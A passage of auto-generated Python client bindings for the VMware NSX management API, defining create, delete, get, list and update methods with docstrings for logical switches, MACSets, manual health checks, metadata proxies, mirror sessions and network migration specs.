:param cascade: Delete a Logical Switch and all the logical ports in it, if none of
the logical ports have any attachment. (optional, default to false)
:type detach: :class:`bool` or ``None``
:param detach: Force delete a logical switch (optional, default to false)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'lswitch_id': lswitch_id,
'cascade': cascade,
'detach': detach,
})
def get(self,
lswitch_id,
):
"""
Returns information about the specified logical switch Id.
:type lswitch_id: :class:`str`
:param lswitch_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.LogicalSwitch`
:return: com.vmware.nsx.model.LogicalSwitch
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'lswitch_id': lswitch_id,
})
def list(self,
cursor=None,
diagnostic=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
switching_profile_id=None,
transport_type=None,
transport_zone_id=None,
uplink_teaming_policy_name=None,
vlan=None,
vni=None,
):
"""
Returns information about all configured logical switches.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type diagnostic: :class:`bool` or ``None``
:param diagnostic: Flag to enable showing of transit logical switch. (optional,
default to false)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:type switching_profile_id: :class:`str` or ``None``
:param switching_profile_id: Switching Profile identifier (optional)
:type transport_type: :class:`str` or ``None``
:param transport_type: Mode of transport supported in the transport zone for this logical
switch (optional)
:type transport_zone_id: :class:`str` or ``None``
:param transport_zone_id: Transport zone identifier (optional)
:type uplink_teaming_policy_name: :class:`str` or ``None``
:param uplink_teaming_policy_name: The logical switch's uplink teaming policy name (optional)
:type vlan: :class:`long` or ``None``
:param vlan: Virtual Local Area Network Identifier (optional)
:type vni: :class:`long` or ``None``
:param vni: VNI of the OVERLAY LogicalSwitch(es) to return. (optional)
:rtype: :class:`com.vmware.nsx.model_client.LogicalSwitchListResult`
:return: com.vmware.nsx.model.LogicalSwitchListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'diagnostic': diagnostic,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
'switching_profile_id': switching_profile_id,
'transport_type': transport_type,
'transport_zone_id': transport_zone_id,
'uplink_teaming_policy_name': uplink_teaming_policy_name,
'vlan': vlan,
'vni': vni,
})
def update(self,
lswitch_id,
logical_switch,
):
"""
Modifies attributes of an existing logical switch. Modifiable
attributes include admin_state, replication_mode, switching_profile_ids
and VLAN spec. You cannot modify the original transport_zone_id.
:type lswitch_id: :class:`str`
:param lswitch_id: (required)
:type logical_switch: :class:`com.vmware.nsx.model_client.LogicalSwitch`
:param logical_switch: (required)
:rtype: :class:`com.vmware.nsx.model_client.LogicalSwitch`
:return: com.vmware.nsx.model.LogicalSwitch
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'lswitch_id': lswitch_id,
'logical_switch': logical_switch,
})
class MacSets(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.mac_sets'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _MacSetsStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
m_ac_set,
):
"""
Creates a new MACSet that can group individual MAC addresses.
:type m_ac_set: :class:`com.vmware.nsx.model_client.MACSet`
:param m_ac_set: (required)
:rtype: :class:`com.vmware.nsx.model_client.MACSet`
:return: com.vmware.nsx.model.MACSet
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'm_ac_set': m_ac_set,
})
def delete(self,
mac_set_id,
force=None,
):
"""
Deletes the specified MACSet. By default, if the MACSet is added to an
NSGroup, it won't be deleted. In such situations, pass \"force=true\"
as query param to force delete the MACSet.
:type mac_set_id: :class:`str`
:param mac_set_id: MACSet Id (required)
:type force: :class:`bool` or ``None``
:param force: Force delete the resource even if it is being used somewhere
(optional, default to false)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.ConcurrentChange`
Conflict
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'mac_set_id': mac_set_id,
'force': force,
})
def get(self,
mac_set_id,
):
"""
Returns information about the specified MACSet
:type mac_set_id: :class:`str`
:param mac_set_id: MACSet Id (required)
:rtype: :class:`com.vmware.nsx.model_client.MACSet`
:return: com.vmware.nsx.model.MACSet
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'mac_set_id': mac_set_id,
})
def list(self,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Returns paginated list of MACSets
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.MACSetListResult`
:return: com.vmware.nsx.model.MACSetListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
mac_set_id,
m_ac_set,
):
"""
Updates the specified MACSet. Modifiable parameters include the
description, display_name and mac_addresses.
:type mac_set_id: :class:`str`
:param mac_set_id: MACSet Id (required)
:type m_ac_set: :class:`com.vmware.nsx.model_client.MACSet`
:param m_ac_set: (required)
:rtype: :class:`com.vmware.nsx.model_client.MACSet`
:return: com.vmware.nsx.model.MACSet
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'mac_set_id': mac_set_id,
'm_ac_set': m_ac_set,
})
class ManualHealthChecks(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.manual_health_checks'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _ManualHealthChecksStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
manual_health_check,
):
"""
Create a new manual health check request with essential properties.
It's disallowed to create new one until the count of in-progress manual
health check is less than 50. A manual health check will be deleted
automatically after finished for 24 hours.
:type manual_health_check: :class:`com.vmware.nsx.model_client.ManualHealthCheck`
:param manual_health_check: (required)
:rtype: :class:`com.vmware.nsx.model_client.ManualHealthCheck`
:return: com.vmware.nsx.model.ManualHealthCheck
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'manual_health_check': manual_health_check,
})
def delete(self,
manual_health_check_id,
):
"""
Delete an existing manual health check by ID.
:type manual_health_check_id: :class:`str`
:param manual_health_check_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'manual_health_check_id': manual_health_check_id,
})
def get(self,
manual_health_check_id,
):
"""
Get an existing manual health check by health check ID.
:type manual_health_check_id: :class:`str`
:param manual_health_check_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.ManualHealthCheck`
:return: com.vmware.nsx.model.ManualHealthCheck
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'manual_health_check_id': manual_health_check_id,
})
def list(self,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Query manual health checks with list parameters.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.ManualHealthCheckListResult`
:return: com.vmware.nsx.model.ManualHealthCheckListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
class MdProxies(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.md_proxies'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _MdProxiesStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
metadata_proxy,
):
"""
Create a metadata proxy
:type metadata_proxy: :class:`com.vmware.nsx.model_client.MetadataProxy`
:param metadata_proxy: (required)
:rtype: :class:`com.vmware.nsx.model_client.MetadataProxy`
:return: com.vmware.nsx.model.MetadataProxy
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'metadata_proxy': metadata_proxy,
})
def delete(self,
proxy_id,
):
"""
Delete a metadata proxy
:type proxy_id: :class:`str`
:param proxy_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'proxy_id': proxy_id,
})
def get(self,
proxy_id,
):
"""
Get a metadata proxy
:type proxy_id: :class:`str`
:param proxy_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.MetadataProxy`
:return: com.vmware.nsx.model.MetadataProxy
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'proxy_id': proxy_id,
})
def list(self,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
Get a paginated list of metadata proxies
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.MetadataProxyListResult`
:return: com.vmware.nsx.model.MetadataProxyListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
proxy_id,
metadata_proxy,
):
"""
Update a metadata proxy
:type proxy_id: :class:`str`
:param proxy_id: (required)
:type metadata_proxy: :class:`com.vmware.nsx.model_client.MetadataProxy`
:param metadata_proxy: (required)
:rtype: :class:`com.vmware.nsx.model_client.MetadataProxy`
:return: com.vmware.nsx.model.MetadataProxy
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'proxy_id': proxy_id,
'metadata_proxy': metadata_proxy,
})
class MirrorSessions(VapiInterface):
"""
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.mirror_sessions'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _MirrorSessionsStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
port_mirroring_session,
):
"""
Create a mirror session
:type port_mirroring_session: :class:`com.vmware.nsx.model_client.PortMirroringSession`
:param port_mirroring_session: (required)
:rtype: :class:`com.vmware.nsx.model_client.PortMirroringSession`
:return: com.vmware.nsx.model.PortMirroringSession
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'port_mirroring_session': port_mirroring_session,
})
def delete(self,
mirror_session_id,
):
"""
Delete the mirror session
:type mirror_session_id: :class:`str`
:param mirror_session_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'mirror_session_id': mirror_session_id,
})
def get(self,
mirror_session_id,
):
"""
Get the mirror session
:type mirror_session_id: :class:`str`
:param mirror_session_id: (required)
:rtype: :class:`com.vmware.nsx.model_client.PortMirroringSession`
:return: com.vmware.nsx.model.PortMirroringSession
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'mirror_session_id': mirror_session_id,
})
def list(self,
cursor=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
):
"""
List all mirror sessions
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:rtype: :class:`com.vmware.nsx.model_client.PortMirroringSessionListResult`
:return: com.vmware.nsx.model.PortMirroringSessionListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
})
def update(self,
mirror_session_id,
port_mirroring_session,
):
"""
Update the mirror session
:type mirror_session_id: :class:`str`
:param mirror_session_id: (required)
:type port_mirroring_session: :class:`com.vmware.nsx.model_client.PortMirroringSession`
:param port_mirroring_session: (required)
:rtype: :class:`com.vmware.nsx.model_client.PortMirroringSession`
:return: com.vmware.nsx.model.PortMirroringSession
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('update',
{
'mirror_session_id': mirror_session_id,
'port_mirroring_session': port_mirroring_session,
})
def verify(self,
mirror_session_id,
):
"""
Verify whether all participants are on the same transport node
:type mirror_session_id: :class:`str`
:param mirror_session_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('verify',
{
'mirror_session_id': mirror_session_id,
})
class NetworkMigrationSpecs(VapiInterface):
"""
"""
LIST_TYPE_HOSTPROFILENETWORKMIGRATIONSPEC = "HostProfileNetworkMigrationSpec"
"""
Possible value for ``type`` of method :func:`NetworkMigrationSpecs.list`.
"""
_VAPI_SERVICE_ID = 'com.vmware.nsx.network_migration_specs'
"""
Identifier of the service in canonical form.
"""
def __init__(self, config):
"""
:type config: :class:`vmware.vapi.bindings.stub.StubConfiguration`
:param config: Configuration to be used for creating the stub.
"""
VapiInterface.__init__(self, config, _NetworkMigrationSpecsStub)
self._VAPI_OPERATION_IDS = {}
def create(self,
network_migration_spec,
):
"""
Network migration specification once created and can be used as a
template to indicate associated component which networks should be
migrated and where. Currently migration template can be associated with
compute collections which are managed by vCenter host profiles, to
trigger automatic migration of networks for Stateless ESX hosts.
Currently we only support creation of HostProfileNetworkMigrationSpec
type of specification. Note- transport node templates APIs are
deprecated and user is recommended to use transport node profiles APIs
instead.
:type network_migration_spec: :class:`vmware.vapi.struct.VapiStruct`
:param network_migration_spec: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.NetworkMigrationSpec`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.NetworkMigrationSpec
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.NetworkMigrationSpec`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('create',
{
'network_migration_spec': network_migration_spec,
})
def delete(self,
template_id,
):
"""
Delete the specified network migration specification template. Delete
will fail if this is a HostProfileNetworkMigrationSpec and is
associated with certain compute collection. Note- transport node
templates APIs are deprecated and user is recommended to use transport
node profiles APIs instead.
:type template_id: :class:`str`
:param template_id: (required)
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('delete',
{
'template_id': template_id,
})
def get(self,
template_id,
):
"""
Network migration specification once created and can be used as a
template to indicate associated component which networks should be
migrated and where. Currently migration template can be associated with
compute collections which are managed by vCenter host profiles, to
trigger automatic migration of networks for Stateless ESX hosts.
Currently we only support creation of HostProfileNetworkMigrationSpec
type of specification. Note- transport node templates APIs are
deprecated and user is recommended to use transport node profiles APIs
instead.
:type template_id: :class:`str`
:param template_id: (required)
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.NetworkMigrationSpec
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.NetworkMigrationSpec`.
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('get',
{
'template_id': template_id,
})
def list(self,
cursor=None,
include_system_owned=None,
included_fields=None,
page_size=None,
sort_ascending=None,
sort_by=None,
type=None,
):
"""
Network migration specification once created and can be used as a
template to indicate associated component which networks should be
migrated and where. Currently migration template can be associated with
compute collections which are managed by vCenter host profiles, to
trigger automatic migration of networks for Stateless ESX hosts.
Currently we only support creation of HostProfileNetworkMigrationSpec
type of specification. Note- transport node templates APIs are
deprecated and user is recommended to use transport node profiles APIs
instead.
:type cursor: :class:`str` or ``None``
:param cursor: Opaque cursor to be used for getting next page of records (supplied
by current result page) (optional)
:type include_system_owned: :class:`bool` or ``None``
:param include_system_owned: Whether the list result contains system resources (optional,
default to false)
:type included_fields: :class:`str` or ``None``
:param included_fields: Comma separated list of fields that should be included in query
result (optional)
:type page_size: :class:`long` or ``None``
:param page_size: Maximum number of results to return in this page (server may return
fewer) (optional, default to 1000)
:type sort_ascending: :class:`bool` or ``None``
:param sort_ascending: (optional)
:type sort_by: :class:`str` or ``None``
:param sort_by: Field by which records are sorted (optional)
:type type: :class:`str` or ``None``
:param type: Supported network migration specification types. (optional)
:rtype: :class:`com.vmware.nsx.model_client.NetworkMigrationSpecListResult`
:return: com.vmware.nsx.model.NetworkMigrationSpecListResult
:raise: :class:`com.vmware.vapi.std.errors_client.ServiceUnavailable`
Service Unavailable
:raise: :class:`com.vmware.vapi.std.errors_client.InvalidRequest`
Bad Request, Precondition Failed
:raise: :class:`com.vmware.vapi.std.errors_client.InternalServerError`
Internal Server Error
:raise: :class:`com.vmware.vapi.std.errors_client.Unauthorized`
Forbidden
:raise: :class:`com.vmware.vapi.std.errors_client.NotFound`
Not Found
"""
return self._invoke('list',
{
'cursor': cursor,
'include_system_owned': include_system_owned,
'included_fields': included_fields,
'page_size': page_size,
'sort_ascending': sort_ascending,
'sort_by': sort_by,
'type': type,
})
def update(self,
template_id,
network_migration_spec,
):
"""
Network migration specification once created and can be used as a
template to indicate associated component which networks should be
migrated and where. Currently migration template can be associated with
compute collections which are managed by vCenter host profiles, to
trigger automatic migration of networks for Stateless ESX hosts.
Currently we only support creation of HostProfileNetworkMigrationSpec
type of specification. For a HostProfileNetworkMigrationSpec which is
already associated with a compute collection, updating it would mean
next time the system needs to trigger migration for hosts managed by
compute collection, it will use the updated migration specification.
Note- transport node templates APIs are deprecated and user is
recommended to use transport node profiles APIs instead.
:type template_id: :class:`str`
:param template_id: (required)
:type network_migration_spec: :class:`vmware.vapi.struct.VapiStruct`
:param network_migration_spec: (required)
The parameter must contain all the attributes defined in
:class:`com.vmware.nsx.model_client.NetworkMigrationSpec`.
:rtype: :class:`vmware.vapi.struct.VapiStruct`
:return: com.vmware.nsx.model.NetworkMigrationSpec
The return value will contain all the attributes defined in
:class:`com.vmware.nsx.model_client.NetworkMigrationSpec`.
